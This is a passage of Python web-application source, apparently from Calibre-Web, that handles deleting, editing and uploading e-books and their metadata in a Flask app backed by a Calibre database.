                new_element = db_object(add_element, None)
            else:  # db_type should be tag or language
                new_element = db_object(add_element)
            changed = True
            db_session.add(new_element)
            db_book_object.append(new_element)
        else:
            # reuse the existing row, syncing its name/sort fields
            db_element = create_objects_for_addition(db_element, add_element, db_type)
            changed = True
            # add element to book
            db_book_object.append(db_element)
    return changed
def create_objects_for_addition(db_element, add_element, db_type):
    """Sync an existing database row with a (possibly re-spelled) input
    name and return it.

    Depending on *db_type* the value/name is updated in place; name-bearing
    types also get their sort field refreshed when the name changed.
    """
    if db_type == 'custom':
        if db_element.value != add_element:
            db_element.value = add_element  # ToDo: Before new_element, but this is not plausible
        return db_element
    if db_type == 'languages':
        if db_element.lang_code != add_element:
            db_element.lang_code = add_element
        return db_element
    if db_element.name != add_element:
        db_element.name = add_element
        if db_type == 'series':
            db_element.sort = add_element
        elif db_type == 'author':
            db_element.sort = add_element.replace('|', ',')
        elif db_type == 'publisher':
            db_element.sort = None
    return db_element
def modify_database_object(input_elements, db_book_object, db_object, db_session, db_type):
    """Reconcile a book's linked objects (authors/tags/series/...) with
    *input_elements*: first unlink entries that are no longer used, then
    link (and create, if needed) the new ones.

    Returns True when the book's links changed.
    """
    # passing input_elements not as a list may lead to undesired results
    if not isinstance(input_elements, list):
        raise TypeError(str(input_elements) + " should be passed as a list")
    # empty names carry no information and are dropped up front
    names = [entry for entry in input_elements if entry != '']
    # 1. elements currently on the book but absent from the input
    obsolete = search_objects_remove(db_book_object, db_type, names)
    # 2. input names not yet linked to the book
    missing = search_objects_add(db_book_object, db_type, names)
    changed = remove_objects(db_book_object, db_session, obsolete)
    if missing:
        changed |= add_objects(db_book_object, db_object, db_session, db_type, missing)
    return changed
def modify_identifiers(input_identifiers, db_identifiers, db_session):
    """Modify Identifiers to match input information.
    input_identifiers is a list of read-to-persist Identifiers objects.
    db_identifiers is a list of already persisted list of Identifiers objects."""
    input_dict = {identifier.type.lower(): identifier for identifier in input_identifiers}
    # duplicate identifier types collapse in the dict -> report as error
    error = len(input_identifiers) != len(input_dict)
    db_dict = {identifier.type.lower(): identifier for identifier in db_identifiers}
    changed = False
    # delete db identifiers not present in input or modify them with input val
    for identifier_type, identifier in db_dict.items():
        if identifier_type not in input_dict:
            db_session.delete(identifier)
            changed = True
        else:
            source = input_dict[identifier_type]
            identifier.type = source.type
            identifier.val = source.val
    # add input identifiers not present in db
    for identifier_type, identifier in input_dict.items():
        if identifier_type not in db_dict:
            db_session.add(identifier)
            changed = True
    return changed, error
@editbook.route("/ajax/delete/<int:book_id>")
@login_required
def delete_book_from_details(book_id):
    """AJAX endpoint: delete the whole book, answering with JSON."""
    return Response(delete_book(book_id, "", True), mimetype='application/json')
@editbook.route("/delete/<int:book_id>", defaults={'book_format': ""})
@editbook.route("/delete/<int:book_id>/<string:book_format>")
@login_required
def delete_book_ajax(book_id, book_format):
    """Delete a whole book (no format given) or a single format,
    answering with a flash message + redirect."""
    return delete_book(book_id, book_format, False)
def delete_whole_book(book_id, book):
    """Remove every trace of *book_id*: app-side references (shelves,
    downloads, read state) and all Calibre metadata links, then delete
    the book row itself (final delete is left for the caller to commit).
    """
    # delete book from Shelfs, Downloads, Read list
    ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == book_id).delete()
    ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == book_id).delete()
    ub.delete_download(book_id)
    ub.session_commit()
    # check if only this book links to:
    # author, language, series, tags, custom columns
    modify_database_object([u''], book.authors, db.Authors, calibre_db.session, 'author')
    modify_database_object([u''], book.tags, db.Tags, calibre_db.session, 'tags')
    modify_database_object([u''], book.series, db.Series, calibre_db.session, 'series')
    modify_database_object([u''], book.languages, db.Languages, calibre_db.session, 'languages')
    modify_database_object([u''], book.publishers, db.Publishers, calibre_db.session, 'publishers')
    cc = calibre_db.session.query(db.Custom_Columns). \
        filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
    for c in cc:
        cc_string = "custom_column_" + str(c.id)
        if not c.is_multiple:
            if len(getattr(book, cc_string)) > 0:
                if c.datatype == 'bool' or c.datatype == 'integer' or c.datatype == 'float':
                    # single-value types: the row belongs to this book only
                    del_cc = getattr(book, cc_string)[0]
                    getattr(book, cc_string).remove(del_cc)
                    log.debug('remove ' + str(c.id))
                    calibre_db.session.delete(del_cc)
                    calibre_db.session.commit()
                elif c.datatype == 'rating':
                    # rating rows are shared between books -> delete only orphans
                    del_cc = getattr(book, cc_string)[0]
                    getattr(book, cc_string).remove(del_cc)
                    if len(del_cc.books) == 0:
                        log.debug('remove ' + str(c.id))
                        calibre_db.session.delete(del_cc)
                        calibre_db.session.commit()
                else:
                    del_cc = getattr(book, cc_string)[0]
                    getattr(book, cc_string).remove(del_cc)
                    log.debug('remove ' + str(c.id))
                    calibre_db.session.delete(del_cc)
                    calibre_db.session.commit()
        else:
            # multi-value custom columns are handled like tags
            modify_database_object([u''], getattr(book, cc_string), db.cc_classes[c.id],
                                   calibre_db.session, 'custom')
    calibre_db.session.query(db.Books).filter(db.Books.id == book_id).delete()
def render_delete_book_result(book_format, jsonResponse, warning, book_id):
    """Build the success answer after a delete operation.

    A single-format delete points back to the edit page, a whole-book
    delete to the index; *jsonResponse* selects JSON output versus a
    flash message plus redirect.  *warning* is passed through in JSON
    answers.
    """
    if book_format:
        if jsonResponse:
            payload = {"location": url_for("editbook.edit_book", book_id=book_id),
                       "type": "success",
                       "format": book_format,
                       "message": _('Book Format Successfully Deleted')}
            return json.dumps([warning, payload])
        flash(_('Book Format Successfully Deleted'), category="success")
        return redirect(url_for('editbook.edit_book', book_id=book_id))
    if jsonResponse:
        payload = {"location": url_for('web.index'),
                   "type": "success",
                   "format": book_format,
                   "message": _('Book Successfully Deleted')}
        return json.dumps([warning, payload])
    flash(_('Book Successfully Deleted'), category="success")
    return redirect(url_for('web.index'))
def delete_book(book_id, book_format, jsonResponse):
    """Delete a whole book (empty *book_format*) or one format of it.

    Requires delete rights.  Depending on *jsonResponse* the answer is a
    JSON document or a flash message plus redirect; non-fatal problems
    are collected in *warning* and passed along with the success answer.
    """
    warning = {}
    if current_user.role_delete_books():
        book = calibre_db.get_book(book_id)
        if book:
            try:
                result, error = helper.delete_book(book, config.config_calibre_dir, book_format=book_format.upper())
                if not result:
                    # filesystem delete failed -> report and bail out
                    if jsonResponse:
                        return json.dumps([{"location": url_for("editbook.edit_book", book_id=book_id),
                                            "type": "danger",
                                            "format": "",
                                            "message": error}])
                    else:
                        flash(error, category="error")
                        return redirect(url_for('editbook.edit_book', book_id=book_id))
                if error:
                    # partial success -> continue but carry a warning
                    if jsonResponse:
                        warning = {"location": url_for("editbook.edit_book", book_id=book_id),
                                   "type": "warning",
                                   "format": "",
                                   "message": error}
                    else:
                        flash(error, category="warning")
                if not book_format:
                    delete_whole_book(book_id, book)
                else:
                    # only drop the matching format row
                    calibre_db.session.query(db.Data).filter(db.Data.book == book.id).\
                        filter(db.Data.format == book_format).delete()
                calibre_db.session.commit()
            except Exception as ex:
                log.debug_or_exception(ex)
                calibre_db.session.rollback()
                if jsonResponse:
                    return json.dumps([{"location": url_for("editbook.edit_book", book_id=book_id),
                                        "type": "danger",
                                        "format": "",
                                        "message": ex}])
                else:
                    flash(str(ex), category="error")
                    return redirect(url_for('editbook.edit_book', book_id=book_id))
        else:
            # book not found
            log.error('Book with id "%s" could not be deleted: not found', book_id)
    return render_delete_book_result(book_format, jsonResponse, warning, book_id)
def render_edit_book(book_id):
    """Render the metadata edit page for one book, including the list of
    valid conversion source/target formats for the convert button."""
    cc = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
    book = calibre_db.get_filtered_book(book_id, allow_show_archived=True)
    if not book:
        flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
        return redirect(url_for("web.index"))
    for lang in book.languages:
        lang.language_name = isoLanguages.get_language_name(get_locale(), lang.lang_code)
    book = calibre_db.order_authors(book)
    author_names = []
    for authr in book.authors:
        author_names.append(authr.name.replace('|', ','))
    # Option for showing convertbook button
    valid_source_formats=list()
    allowed_conversion_formats = list()
    kepub_possible=None
    if config.config_converterpath:
        for file in book.data:
            if file.format.lower() in constants.EXTENSIONS_CONVERT_FROM:
                valid_source_formats.append(file.format.lower())
    # kepubify only needs an epub source, independent of the converter
    if config.config_kepubifypath and 'epub' in [file.format.lower() for file in book.data]:
        kepub_possible = True
        if not config.config_converterpath:
            valid_source_formats.append('epub')
    # Determine what formats don't already exist
    if config.config_converterpath:
        allowed_conversion_formats = constants.EXTENSIONS_CONVERT_TO[:]
        for file in book.data:
            if file.format.lower() in allowed_conversion_formats:
                allowed_conversion_formats.remove(file.format.lower())
    if kepub_possible:
        allowed_conversion_formats.append('kepub')
    return render_title_template('book_edit.html', book=book, authors=author_names, cc=cc,
                                 title=_(u"edit metadata"), page="editbook",
                                 conversion_formats=allowed_conversion_formats,
                                 config=config,
                                 source_formats=valid_source_formats)
def edit_book_ratings(to_save, book):
    """Apply the 'rating' form field to the book.

    Ratings are stored doubled (half stars become integers).  Returns
    True when the stored rating changed.
    """
    changed = False
    if to_save["rating"].strip():
        old_rating = False
        if len(book.ratings) > 0:
            old_rating = book.ratings[0].rating
        ratingx2 = int(float(to_save["rating"]) * 2)
        if ratingx2 != old_rating:
            changed = True
            # rating rows are shared -> reuse an existing row when possible
            is_rating = calibre_db.session.query(db.Ratings).filter(db.Ratings.rating == ratingx2).first()
            if is_rating:
                book.ratings.append(is_rating)
            else:
                new_rating = db.Ratings(rating=ratingx2)
                book.ratings.append(new_rating)
            if old_rating:
                book.ratings.remove(book.ratings[0])
    else:
        # empty form field clears an existing rating
        if len(book.ratings) > 0:
            book.ratings.remove(book.ratings[0])
            changed = True
    return changed
def edit_book_tags(tags, book):
    """Replace the book's tag links with the comma-separated *tags* string.
    Returns True when the links changed."""
    tag_names = [name.strip() for name in tags.split(',')]
    # Remove duplicates
    tag_names = helper.uniq(tag_names)
    return modify_database_object(tag_names, book.tags, db.Tags, calibre_db.session, 'tags')
def edit_book_series(series, book):
    """Set the book's (single) series from *series*; an empty or
    whitespace-only value clears it.  Returns True on change."""
    name = series.strip()
    entries = [name] if name else []
    return modify_database_object(entries, book.series, db.Series, calibre_db.session, 'series')
def edit_book_series_index(series_index, book):
    """Store *series_index* on the book; returns True when it changed.

    An empty value falls back to '1'; non-numeric values are rejected
    with a warning flash and leave the book untouched.
    """
    # Add default series_index to book
    series_index = series_index or '1'
    if not series_index.replace('.', '', 1).isdigit():
        flash(_("%(seriesindex)s is not a valid number, skipping", seriesindex=series_index), category="warning")
        return False
    if book.series_index == series_index:
        return False
    book.series_index = series_index
    return True
# Handle book comments/description
def edit_book_comments(comments, book):
    """Store the sanitized description text; returns True on change."""
    modif_date = False
    if comments:
        comments = clean_html(comments)
    if len(book.comments):
        if book.comments[0].text != comments:
            # NOTE(review): when *comments* is empty/falsy the first
            # clean_html call is skipped but this one still runs on the
            # raw value -- confirm clean_html accepts that input.
            book.comments[0].text = clean_html(comments)
            modif_date = True
    else:
        if comments:
            book.comments.append(db.Comments(text=comments, book=book.id))
            modif_date = True
    return modif_date
def edit_book_languages(languages, book, upload=False, invalid=None):
    """Replace the book's languages from a comma-separated string.

    Unknown names are logged and either appended to *invalid* (when a
    list is supplied) or flashed.  Returns True when the links changed.
    """
    input_languages = languages.split(',')
    unknown_languages = []
    if not upload:
        input_l = isoLanguages.get_language_codes(get_locale(), input_languages, unknown_languages)
    else:
        input_l = isoLanguages.get_valid_language_codes(get_locale(), input_languages, unknown_languages)
    for l in unknown_languages:
        log.error('%s is not a valid language', l)
        if isinstance(invalid, list):
            invalid.append(l)
        else:
            flash(_(u"%(langname)s is not a valid language", langname=l), category="warning")
    # ToDo: Not working correct
    if upload and len(input_l) == 1:
        # If the language of the file is excluded from the users view, it's not imported, to allow the user to view
        # the book it's language is set to the filter language
        if input_l[0] != current_user.filter_language() and current_user.filter_language() != "all":
            input_l[0] = calibre_db.session.query(db.Languages). \
                filter(db.Languages.lang_code == current_user.filter_language()).first().lang_code
    # Remove duplicates
    input_l = helper.uniq(input_l)
    return modify_database_object(input_l, book.languages, db.Languages, calibre_db.session, 'languages')
def edit_book_publisher(publishers, book):
    """Replace the book's publisher with *publishers* (a single name);
    an empty value removes the existing link.  Returns True on change."""
    changed = False
    if publishers:
        name = publishers.rstrip().strip()
        # only touch the database when the publisher actually differs
        if not book.publishers or name != book.publishers[0].name:
            changed |= modify_database_object([name], book.publishers, db.Publishers, calibre_db.session,
                                              'publisher')
    elif len(book.publishers):
        changed |= modify_database_object([], book.publishers, db.Publishers, calibre_db.session, 'publisher')
    return changed
def edit_cc_data_value(book_id, book, c, to_save, cc_db_value, cc_string):
    """Normalize and store a non-text custom-column value (bool, int,
    float, datetime, comments).

    Returns (changed, to_save) — the form dict is mutated with the
    normalized value.
    """
    changed = False
    # normalize the raw form string according to the column datatype
    if to_save[cc_string] == 'None':
        to_save[cc_string] = None
    elif c.datatype == 'bool':
        to_save[cc_string] = 1 if to_save[cc_string] == 'True' else 0
    elif c.datatype == 'comments':
        to_save[cc_string] = Markup(to_save[cc_string]).unescape()
        if to_save[cc_string]:
            to_save[cc_string] = clean_html(to_save[cc_string])
    elif c.datatype == 'datetime':
        try:
            to_save[cc_string] = datetime.strptime(to_save[cc_string], "%Y-%m-%d")
        except ValueError:
            to_save[cc_string] = db.Books.DEFAULT_PUBDATE
    if to_save[cc_string] != cc_db_value:
        if cc_db_value is not None:
            if to_save[cc_string] is not None:
                # overwrite the existing value in place
                setattr(getattr(book, cc_string)[0], 'value', to_save[cc_string])
                changed = True
            else:
                # value cleared -> remove the row
                del_cc = getattr(book, cc_string)[0]
                getattr(book, cc_string).remove(del_cc)
                calibre_db.session.delete(del_cc)
                changed = True
        else:
            # no previous value -> create a new custom-column row
            cc_class = db.cc_classes[c.id]
            new_cc = cc_class(value=to_save[cc_string], book=book_id)
            calibre_db.session.add(new_cc)
            changed = True
    return changed, to_save
def edit_cc_data_string(book, c, to_save, cc_db_value, cc_string):
    """Store a text-like custom-column value (including ratings, which
    are doubled to integers).

    Returns (changed, to_save).
    """
    changed = False
    if c.datatype == 'rating':
        to_save[cc_string] = str(int(float(to_save[cc_string]) * 2))
    if to_save[cc_string].strip() != cc_db_value:
        if cc_db_value is not None:
            # remove old cc_val
            del_cc = getattr(book, cc_string)[0]
            getattr(book, cc_string).remove(del_cc)
            if len(del_cc.books) == 0:
                calibre_db.session.delete(del_cc)
                changed = True
        cc_class = db.cc_classes[c.id]
        new_cc = calibre_db.session.query(cc_class).filter(
            cc_class.value == to_save[cc_string].strip()).first()
        # if no cc val is found add it
        if new_cc is None:
            new_cc = cc_class(value=to_save[cc_string].strip())
            calibre_db.session.add(new_cc)
            changed = True
            # flush so the fresh row can be re-queried below
            calibre_db.session.flush()
            new_cc = calibre_db.session.query(cc_class).filter(
                cc_class.value == to_save[cc_string].strip()).first()
        # add cc value to book
        getattr(book, cc_string).append(new_cc)
    return changed, to_save
def edit_cc_data(book_id, book, to_save):
    """Apply all custom-column form fields to the book.

    Single-value columns are dispatched by datatype; multi-value columns
    are reconciled like tags.  Returns True when anything changed.
    """
    changed = False
    cc = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
    for c in cc:
        cc_string = "custom_column_" + str(c.id)
        if not c.is_multiple:
            if len(getattr(book, cc_string)) > 0:
                cc_db_value = getattr(book, cc_string)[0].value
            else:
                cc_db_value = None
            if to_save[cc_string].strip():
                if c.datatype in ['int', 'bool', 'float', "datetime", "comments"]:
                    changed, to_save = edit_cc_data_value(book_id, book, c, to_save, cc_db_value, cc_string)
                else:
                    changed, to_save = edit_cc_data_string(book, c, to_save, cc_db_value, cc_string)
            else:
                # empty field clears a previously stored value
                if cc_db_value is not None:
                    # remove old cc_val
                    del_cc = getattr(book, cc_string)[0]
                    getattr(book, cc_string).remove(del_cc)
                    if not del_cc.books or len(del_cc.books) == 0:
                        calibre_db.session.delete(del_cc)
                        changed = True
        else:
            # multi-value column: reconcile comma-separated entries
            input_tags = to_save[cc_string].split(',')
            input_tags = list(map(lambda it: it.strip(), input_tags))
            changed |= modify_database_object(input_tags,
                                              getattr(book, cc_string),
                                              db.cc_classes[c.id],
                                              calibre_db.session,
                                              'custom')
    return changed
def upload_single_file(request, book, book_id):
    """Attach an uploaded format file ('btn-upload-format') to a book.

    Validates the extension, stores the file in the library directory,
    registers the format row in the database and queues a notification.
    Returns the uploader's metadata on success, a redirect on error, or
    None when the request carried no file.
    """
    # Check and handle Uploaded file
    if 'btn-upload-format' in request.files:
        requested_file = request.files['btn-upload-format']
        # check for empty request
        if requested_file.filename != '':
            if not current_user.role_upload():
                abort(403)
            if '.' in requested_file.filename:
                file_ext = requested_file.filename.rsplit('.', 1)[-1].lower()
                if file_ext not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
                    flash(_("File extension '%(ext)s' is not allowed to be uploaded to this server", ext=file_ext),
                          category="error")
                    return redirect(url_for('web.show_book', book_id=book.id))
            else:
                flash(_('File to be uploaded must have an extension'), category="error")
                return redirect(url_for('web.show_book', book_id=book.id))
            file_name = book.path.rsplit('/', 1)[-1]
            filepath = os.path.normpath(os.path.join(config.config_calibre_dir, book.path))
            saved_filename = os.path.join(filepath, file_name + '.' + file_ext)
            # check if file path exists, otherwise create it, copy file to calibre path and delete temp file
            if not os.path.exists(filepath):
                try:
                    os.makedirs(filepath)
                except OSError:
                    flash(_(u"Failed to create path %(path)s (Permission denied).", path=filepath), category="error")
                    return redirect(url_for('web.show_book', book_id=book.id))
            try:
                requested_file.save(saved_filename)
            except OSError:
                flash(_(u"Failed to store file %(file)s.", file=saved_filename), category="error")
                return redirect(url_for('web.show_book', book_id=book.id))
            file_size = os.path.getsize(saved_filename)
            is_format = calibre_db.get_book_format(book_id, file_ext.upper())
            # Format entry already exists, no need to update the database
            if is_format:
                log.warning('Book format %s already existing', file_ext.upper())
            else:
                try:
                    db_format = db.Data(book_id, file_ext.upper(), file_size, file_name)
                    calibre_db.session.add(db_format)
                    calibre_db.session.commit()
                    calibre_db.update_title_sort(config)
                except (OperationalError, IntegrityError) as e:
                    calibre_db.session.rollback()
                    log.error('Database error: %s', e)
                    flash(_(u"Database error: %(error)s.", error=e), category="error")
                    return redirect(url_for('web.show_book', book_id=book.id))
            # Queue uploader info
            uploadText=_(u"File format %(ext)s added to %(book)s", ext=file_ext.upper(), book=book.title)
            WorkerThread.add(current_user.name, TaskUpload(
                "<a href=\"" + url_for('web.show_book', book_id=book.id) + "\">" + uploadText + "</a>"))
            return uploader.process(
                saved_filename, *os.path.splitext(requested_file.filename),
                rarExecutable=config.config_rarfile_location)
def upload_cover(request, book):
    """Handle an uploaded cover image, if any.

    Returns True on success, False on failure (an error is flashed) and
    None when the request carried no cover file.
    """
    if 'btn-upload-cover' not in request.files:
        return None
    requested_file = request.files['btn-upload-cover']
    # check for empty request
    if requested_file.filename == '':
        return None
    if not current_user.role_upload():
        abort(403)
    ret, message = helper.save_cover(requested_file, book.path)
    if ret is True:
        return True
    flash(message, category="error")
    return False
def handle_title_on_edit(book, book_title):
    """Apply *book_title* (trimmed) to the book.

    An empty new title is replaced by the localized 'Unknown'.  Returns
    True when the stored title changed.
    """
    # handle book title
    book_title = book_title.rstrip().strip()
    if book.title == book_title:
        return False
    # never store an empty title
    if book_title == '':
        book_title = _(u'Unknown')
    book.title = book_title
    return True
def handle_author_on_edit(book, author_name, update_stored=True):
    """Apply an edited author string ('A & B & ...') to *book*.

    Returns a tuple (input_authors, change) with the cleaned author list
    and a flag telling whether the database objects were modified.
    """
    # Split on '&', strip whitespace, store commas as '|', drop duplicates.
    input_authors = helper.uniq(
        [name.strip().replace(',', '|') for name in author_name.split('&')])
    if input_authors == ['']:
        input_authors = [_(u'Unknown')]  # prevent empty Author
    change = modify_database_object(input_authors, book.authors, db.Authors,
                                    calibre_db.session, 'author')
    # Assemble the combined author-sort string: known authors contribute
    # their stored sort name, unknown ones a freshly generated one.
    sort_authors_list = []
    for author in input_authors:
        stored = calibre_db.session.query(db.Authors).filter(
            db.Authors.name == author).first()
        base = stored.sort if stored else helper.get_sorted_author(author)
        sort_authors_list.append(helper.get_sorted_author(base))
    sort_authors = ' & '.join(sort_authors_list)
    if book.author_sort != sort_authors and update_stored:
        book.author_sort = sort_authors
        change = True
    return input_authors, change
@editbook.route("/admin/book/<int:book_id>", methods=['GET', 'POST'])
@login_required_if_no_ano
@edit_required
def edit_book(book_id):
    """Render (GET) or process (POST) the metadata edit form for one book.

    On POST every metadata facet (title, authors, cover, series, comments,
    identifiers, tags, publisher, languages, ratings, custom columns,
    pubdate) is updated; the directory structure on disk is renamed when
    title or authors changed, and the result is committed in one go.
    Any failure rolls the session back and redirects with an error flash.
    """
    modif_date = False
    # create the function for sorting...
    try:
        calibre_db.update_title_sort(config)
    except sqliteOperationalError as e:
        log.debug_or_exception(e)
        calibre_db.session.rollback()
    # Show form
    if request.method != 'POST':
        return render_edit_book(book_id)
    book = calibre_db.get_filtered_book(book_id, allow_show_archived=True)
    # Book not found
    if not book:
        flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
        return redirect(url_for("web.index"))
    # Optional file/cover uploads attached to the same form.
    meta = upload_single_file(request, book, book_id)
    if upload_cover(request, book) is True:
        book.has_cover = 1
        modif_date = True
    try:
        to_save = request.form.to_dict()
        # Empty form fields fall back to metadata extracted from the upload.
        merge_metadata(to_save, meta)
        # Update book
        edited_books_id = None
        # handle book title
        title_change = handle_title_on_edit(book, to_save["book_title"])
        input_authors, authorchange = handle_author_on_edit(book, to_save["author_name"])
        if authorchange or title_change:
            edited_books_id = book.id
            modif_date = True
        if config.config_use_google_drive:
            gdriveutils.updateGdriveCalibreFromLocal()
        # Rename author/title folders on disk only when either changed.
        error = False
        if edited_books_id:
            error = helper.update_dir_stucture(edited_books_id, config.config_calibre_dir, input_authors[0])
        if not error:
            if "cover_url" in to_save:
                if to_save["cover_url"]:
                    if not current_user.role_upload():
                        return "", (403)
                    # The generic placeholder URL means "remove the cover".
                    if to_save["cover_url"].endswith('/static/generic_cover.jpg'):
                        book.has_cover = 0
                    else:
                        result, error = helper.save_cover_from_url(to_save["cover_url"], book.path)
                        if result is True:
                            book.has_cover = 1
                            modif_date = True
                        else:
                            flash(error, category="error")
            # Add default series_index to book
            modif_date |= edit_book_series_index(to_save["series_index"], book)
            # Handle book comments/description
            modif_date |= edit_book_comments(Markup(to_save['description']).unescape(), book)
            # Handle identifiers
            input_identifiers = identifier_list(to_save, book)
            modification, warning = modify_identifiers(input_identifiers, book.identifiers, calibre_db.session)
            if warning:
                flash(_("Identifiers are not Case Sensitive, Overwriting Old Identifier"), category="warning")
            modif_date |= modification
            # Handle book tags
            modif_date |= edit_book_tags(to_save['tags'], book)
            # Handle book series
            modif_date |= edit_book_series(to_save["series"], book)
            # handle book publisher
            modif_date |= edit_book_publisher(to_save['publisher'], book)
            # handle book languages
            modif_date |= edit_book_languages(to_save['languages'], book)
            # handle book ratings
            modif_date |= edit_book_ratings(to_save, book)
            # handle cc data
            modif_date |= edit_cc_data(book_id, book, to_save)
            # An unparsable or missing pubdate resets to the Calibre default.
            if to_save["pubdate"]:
                try:
                    book.pubdate = datetime.strptime(to_save["pubdate"], "%Y-%m-%d")
                except ValueError:
                    book.pubdate = db.Books.DEFAULT_PUBDATE
            else:
                book.pubdate = db.Books.DEFAULT_PUBDATE
            if modif_date:
                book.last_modified = datetime.utcnow()
            calibre_db.session.merge(book)
            calibre_db.session.commit()
            if config.config_use_google_drive:
                gdriveutils.updateGdriveCalibreFromLocal()
            if "detail_view" in to_save:
                return redirect(url_for('web.show_book', book_id=book.id))
            else:
                flash(_("Metadata successfully updated"), category="success")
                return render_edit_book(book_id)
        else:
            calibre_db.session.rollback()
            flash(error, category="error")
            return render_edit_book(book_id)
    except Exception as ex:
        log.debug_or_exception(ex)
        calibre_db.session.rollback()
        flash(_("Error editing book, please check logfile for details"), category="error")
        return redirect(url_for('web.show_book', book_id=book.id))
def merge_metadata(to_save, meta):
    """Fill empty form fields in *to_save* from extracted file metadata.

    Form values always win; *meta* attributes are used only as fallback.
    A literal 'Unknown' author/title is treated as empty first.
    """
    if to_save['author_name'] == _(u'Unknown'):
        to_save['author_name'] = ''
    if to_save['book_title'] == _(u'Unknown'):
        to_save['book_title'] = ''
    field_map = [('tags', 'tags'), ('author_name', 'author'),
                 ('series', 'series'), ('series_index', 'series_id'),
                 ('languages', 'languages'), ('book_title', 'title')]
    for form_field, meta_field in field_map:
        if not to_save[form_field]:
            to_save[form_field] = getattr(meta, meta_field, '')
    if not to_save["description"]:
        to_save["description"] = Markup(getattr(meta, 'description', '')).unescape()
def identifier_list(to_save, book):
    """Generate a list of Identifiers from form information"""
    id_type_prefix = 'identifier-type-'
    id_val_prefix = 'identifier-val-'
    result = []
    # Each identifier is posted as a 'identifier-type-<n>' /
    # 'identifier-val-<n>' pair; pairs missing a value are skipped.
    for key, id_type in to_save.items():
        if not key.startswith(id_type_prefix):
            continue
        val_key = id_val_prefix + key[len(id_type_prefix):]
        if val_key in to_save:
            result.append(db.Identifiers(to_save[val_key], id_type, book.id))
    return result
def prepare_authors_on_upload(title, authr):
    """Resolve the author string of a freshly uploaded book.

    Warns (via flash) when a book with the same title/author seems to exist
    already, then splits, normalizes and de-duplicates the author string.

    Returns a tuple ``(sort_authors, input_authors, db_author)``:
    the combined author-sort string, the cleaned list of author names, and
    the first db.Authors row encountered (looked up or newly created).
    """
    if title != _(u'Unknown') and authr != _(u'Unknown'):
        entry = calibre_db.check_exists_book(authr, title)
        if entry:
            log.info("Uploaded book probably exists in library")
            flash(_(u"Uploaded book probably exists in the library, consider to change before upload new: ")
                  + Markup(render_title_template('book_exists_flash.html', entry=entry)), category="warning")
    # handle authors
    input_authors = authr.split('&')
    # handle_authors(input_authors)
    input_authors = list(map(lambda it: it.strip().replace(',', '|'), input_authors))
    # Remove duplicates in authors list
    input_authors = helper.uniq(input_authors)
    # we have all author names now
    if input_authors == ['']:
        input_authors = [_(u'Unknown')] # prevent empty Author
    sort_authors_list = list()
    db_author = None
    for inp in input_authors:
        stored_author = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
        if not stored_author:
            if not db_author:
                db_author = db.Authors(inp, helper.get_sorted_author(inp), "")
            # NOTE(review): if a *second* unknown author follows, db_author is
            # already set, so the first row is re-added instead of creating a
            # new Authors row for this name — confirm this is intended.
            calibre_db.session.add(db_author)
            calibre_db.session.commit()
            sort_author = helper.get_sorted_author(inp)
        else:
            if not db_author:
                db_author = stored_author
            sort_author = stored_author.sort
        sort_authors_list.append(sort_author)
    sort_authors = ' & '.join(sort_authors_list)
    return sort_authors, input_authors, db_author
def create_book_on_upload(modif_date, meta):
    """Create the db.Books row plus related rows for an uploaded file.

    The new book is added and flushed (so ``db_book.id`` is available) but
    NOT committed; the caller is responsible for the final commit.
    Returns ``(db_book, input_authors, title_dir)``.
    """
    title = meta.title
    authr = meta.author
    sort_authors, input_authors, db_author = prepare_authors_on_upload(title, authr)
    title_dir = helper.get_valid_filename(title)
    author_dir = helper.get_valid_filename(db_author.name)
    # combine path and normalize path from windows systems
    path = os.path.join(author_dir, title_dir).replace('\\', '/')
    # Calibre adds books with utc as timezone
    # (datetime(101, 1, 1) is the sentinel "no pubdate" value.)
    db_book = db.Books(title, "", sort_authors, datetime.utcnow(), datetime(101, 1, 1),
                       '1', datetime.utcnow(), path, meta.cover, db_author, [], "")
    modif_date |= modify_database_object(input_authors, db_book.authors, db.Authors, calibre_db.session,
                                         'author')
    # Add series_index to book
    modif_date |= edit_book_series_index(meta.series_id, db_book)
    # add languages
    modif_date |= edit_book_languages(meta.languages, db_book, upload=True)
    # handle tags
    modif_date |= edit_book_tags(meta.tags, db_book)
    # handle publisher
    modif_date |= edit_book_publisher(meta.publisher, db_book)
    # handle series
    modif_date |= edit_book_series(meta.series, db_book)
    # Add file to book
    file_size = os.path.getsize(meta.file_path)
    db_data = db.Data(db_book, meta.extension.upper()[1:], file_size, title_dir)
    db_book.data.append(db_data)
    calibre_db.session.add(db_book)
    # flush content, get db_book.id available
    calibre_db.session.flush()
    return db_book, input_authors, title_dir
def file_handling_on_upload(requested_file):
    """Validate an uploaded file's extension and extract its metadata.

    Returns ``(meta, None)`` on success or ``(None, response)`` on failure,
    where *response* is a JSON redirect back to the start page.
    """
    # check if file extension is correct
    if '.' not in requested_file.filename:
        flash(_('File to be uploaded must have an extension'), category="error")
        return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
    file_ext = requested_file.filename.rsplit('.', 1)[-1].lower()
    if file_ext not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
        flash(
            _("File extension '%(ext)s' is not allowed to be uploaded to this server",
              ext=file_ext), category="error")
        return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
    # extract metadata from file
    try:
        meta = uploader.upload(requested_file, config.config_rarfile_location)
    except (IOError, OSError):
        log.error("File %s could not saved to temp dir", requested_file.filename)
        flash(_(u"File %(filename)s could not saved to temp dir",
                filename=requested_file.filename), category="error")
        return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
    return meta, None
def move_coverfile(meta, db_book):
    """Copy the uploaded cover (or the generic placeholder) into the book's
    library folder as cover.jpg and delete the temporary cover file."""
    # move cover to final directory, including book id
    coverfile = meta.cover if meta.cover else os.path.join(constants.STATIC_DIR, 'generic_cover.jpg')
    new_coverpath = os.path.join(config.config_calibre_dir, db_book.path, "cover.jpg")
    try:
